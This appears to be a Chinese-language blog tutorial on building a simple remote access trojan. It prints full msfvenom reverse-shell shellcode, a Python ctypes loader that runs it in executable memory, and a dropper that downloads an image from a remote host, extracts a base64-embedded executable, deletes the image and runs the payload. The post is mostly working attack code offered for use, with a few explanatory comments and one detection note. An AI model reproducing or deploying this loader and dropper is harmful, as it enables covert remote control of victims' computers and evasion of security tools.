
什么是rat

可以在受害者机器内安装恶意组件
以下来自百度的解释:

rat是特洛伊木马的一个变体,也称为net-hack程序。RAT是一个可以在目标计算机上安装服务器组件的恶意代码。

思路

1.msf生成shellcode
2.将shellcode base64编码藏在图片里
3.将图片放入远程站点
4.py写一个下载远程图片并匹配出base64写入exe
5.删除下载的图片

操作

msf生成的shellcode

# Opaque payload bytes pasted from the msfvenom output described in the
# post; they are not decoded or analysed here. Later the author replaces
# the placeholder `buf` in the loader script with this value.
buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41"
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66"
buf += b"\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80"
buf += b"\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50"
buf += b"\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48"
buf += b"\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75"
buf += b"\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b"
buf += b"\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
buf += b"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
buf += b"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
buf += b"\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f"
buf += b"\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0"
buf += b"\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0"
buf += b"\xa8\xf1\x84\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba"
buf += b"\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00"
buf += b"\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41"
buf += b"\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48"
buf += b"\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2"
buf += b"\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0"
buf += b"\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48"
buf += b"\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
buf += b"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"
buf += b"\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
buf += b"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31"
buf += b"\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49"
buf += b"\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89"
buf += b"\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d"
buf += b"\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a"
buf += b"\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff"
buf += b"\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4"
buf += b"\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2"
buf += b"\x56\xff\xd5"

使用py来执行shellcode
import ctypes
import sys
import chardet
from ctypes import *
import binascii

# Loader script from the post: copies `buf` into an executable memory region
# and starts a thread there. `buf` is a placeholder; the author substitutes
# the msfvenom bytes shown above before packaging this into an exe.
buf =  b"shellcode"



# Both values are documented by Microsoft: PAGE_EXECUTE_READWRITE is the
# read/write/execute page protection, VIRTUAL_MEM is the allocation type.
PAGE_EXECUTE_READWRITE = 0x00000040 # page protection: readable, writable and executable
VIRTUAL_MEM = ( 0x1000 | 0x2000 ) # allocation type; 0x1000 | 0x2000 are MEM_COMMIT | MEM_RESERVE
buf_arr = bytearray (buf) # mutable copy of the payload bytes
buf_size = len(buf_arr) # payload length in bytes
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") # load kernel32.dll through ctypes
kernel32.VirtualAlloc.restype = ctypes.c_uint64 # treat the returned address as a 64-bit integer
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) # RWX region of buf_size bytes
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) # ctypes char array backed by buf_arr (no copy)
#print(sc_ptr)
#print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr),buf_ptr,ctypes.c_int(buf_size)) # copy the payload into the RWX region

# Thread start address is the RWX region; the script then blocks on the thread.
# Detection note: VirtualAlloc(RWX) -> RtlMoveMemory -> CreateThread issued
# from a python.exe process is a widely monitored API sequence for EDR and
# memory-scanning rules.
handle = kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(sc_ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) # -1 is the INFINITE wait
将执行shellcode的py打包成exe,然后打开,对其进行base64编码

然后用HxDx64打开指定的图片,然后将
base64编码的exe写入到图片里

我的图片是

EPnxwn.png

加入base64编码后的exe

EPnzoq.png

加入shellcode后图片大小为7mb

EPupF0.png

注意

将其放到远程站点,这里以phpstudy搭建为例,不要放到图床,图床会把你的图片模糊化或压缩变小,
shellcode就少了
代码

代码如下

#author:九世
#time:2019/4/20

import asyncio
import requests
import re
import base64
import os

async def demo():
    """Download the carrier image from `url` and save it as ./xxx.jpg.

    The response body is written unconditionally; the HTTP status is not
    checked, so whatever the server returns becomes xxx.jpg.
    """
    url = 'http://192.168.3.83/timg.jpg' # the author's image URL (lab address)
    rqt=requests.get(url=url)
    with open('xxx.jpg','wb') as r:
        r.write(rqt.content)

def zx():
    """Carve the base64-encoded exe out of xxx.jpg, write it as demo.exe and run it.

    The image bytes are turned into text with str() (the bytes repr) and the
    "b'" / "'" wrapper stripped; everything from the first 'TVq' onward is
    taken as the base64 blob ('TVq' is how the leading 'MZ' bytes of a
    Windows executable appear in base64). The carrier image is deleted
    before demo.exe is launched.
    On-disk artifacts: xxx.jpg (transient) and demo.exe in the working directory.
    """
    dq=open('xxx.jpg','rb') # file object is never closed
    zg=str(dq.read()).replace("b'",'').replace("'",'') # bytes repr -> text, wrapper stripped
    pp=re.findall('TVq.*',zg) # greedy: from the first 'TVq' to the end of the repr
    zh=base64.b64decode(pp[0]) # IndexError if the image holds no 'TVq'
    with open('demo.exe','wb') as w:
        w.write(zh)
    os.remove('xxx.jpg')
    os.system('demo.exe')

def pd():
    """Call zx() only if ./xxx.jpg exists and has exactly the expected size.

    7985376 is the byte size of the author's own carrier image (the post
    says about 7 MB after embedding); any other size makes the script exit().
    A missing file falls through and returns None.
    """
    j='xxx.jpg'
    if os.path.exists(j):
        file=os.path.getsize(j) # size in bytes
        if file==7985376: # hard-coded to the author's specific image
            zx()
        else:
            exit()

async  def main():
    """Schedule demo() as a future and wait for it to complete."""
    thead=[]
    thead.append(asyncio.ensure_future(demo()))
    await asyncio.wait(thead)
if __name__ == '__main__':
    # Download first on the event loop, then size-check the file and hand off to zx().
    loop=asyncio.get_event_loop()
    loop.run_until_complete(main())
    loop.close()
    pd()

测试结果
EPusmj.md.gif

仓库地址:

https://github.com/422926799/python/tree/master/%E7%AE%80%E5%8D%95%E7%9A%84RAT